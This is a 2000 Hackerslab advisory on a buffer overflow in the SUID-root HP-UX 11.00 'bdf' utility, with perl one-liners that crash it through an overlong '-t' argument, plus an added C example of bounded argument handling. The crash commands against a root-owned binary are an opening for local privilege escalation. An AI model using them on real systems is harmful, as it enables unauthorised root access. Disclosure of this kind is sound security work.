Title: HP-UX bdf -t option buffer overflow
Released by: Hackerslab
Date: 27th July 2000
================================================================================
[ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul
================================================================================
File : /usr/bin/bdf
SYSTEM : HP-UX 11.00
Tested on HP-UX B.11.00
INFO :
  bdf - report number of free disk blocks (Berkeley version)
  -t type   Report on the file systems of a given type (for
            example, nfs or hfs).
* The 'bdf' program has the SUID bit set.
$ ls -la `which bdf`
-r-sr-xr-x 1 root bin 24576 Apr 7 1998 /usr/bin/bdf
* Using the '-t' option with a long string
$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omitted...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$
***
If the '-t' argument is longer than 2415 characters, 'bdf' crashes with a
memory fault (segmentation fault).
Maybe 'bdf' does not check the string boundary.
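
Added example, not part of the original advisory and not HP-UX bdf source code: a bounded handler for a '-t type' argument, showing the length check the crash above suggests is missing. The names set_fs_type and FS_TYPE_MAX, the 16-byte limit and the allowed character set are assumptions made for illustration.

```c
/* Added illustration: hypothetical option handling, not HP-UX bdf source. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FS_TYPE_MAX 16  /* assumed limit; type names such as nfs, hfs are short */

/* The pattern the crash suggests (an assumption, shown only as a comment):
 *     char type[N]; strcpy(type, optarg);    <- no length check
 */

/* Copy a -t argument into dst only if it fits and looks like a type name.
 * Returns 0 on success, -1 if the argument is rejected. dst is always
 * NUL-terminated when dstlen > 0. */
int set_fs_type(char *dst, size_t dstlen, const char *arg)
{
    size_t i, len;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (arg == NULL)
        return -1;

    len = strlen(arg);
    if (len == 0 || len >= dstlen)      /* reject before any copy happens */
        return -1;
    for (i = 0; i < len; i++) {         /* assumed charset: alnum and '_' */
        if (!isalnum((unsigned char)arg[i]) && arg[i] != '_')
            return -1;
    }
    memcpy(dst, arg, len + 1);          /* len + 1 <= dstlen, includes NUL */
    return 0;
}

int main(int argc, char **argv)
{
    char type[FS_TYPE_MAX];

    if (argc != 2 || set_fs_type(type, sizeof type, argv[1]) != 0) {
        fprintf(stderr, "usage: %s type  (at most %d characters)\n",
                argc > 0 ? argv[0] : "fstype", FS_TYPE_MAX - 1);
        return 1;
    }
    printf("type: %s\n", type);
    return 0;
}
```

With this check, both the 2415-character and the 2416-character arguments from the transcript above are rejected with a usage error instead of reaching a fixed-size buffer.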
SOLUTION
Don't know :)
==-------------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* *
* ** ** * dubhe@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 2000
==-------------------------------------------------------------------------------==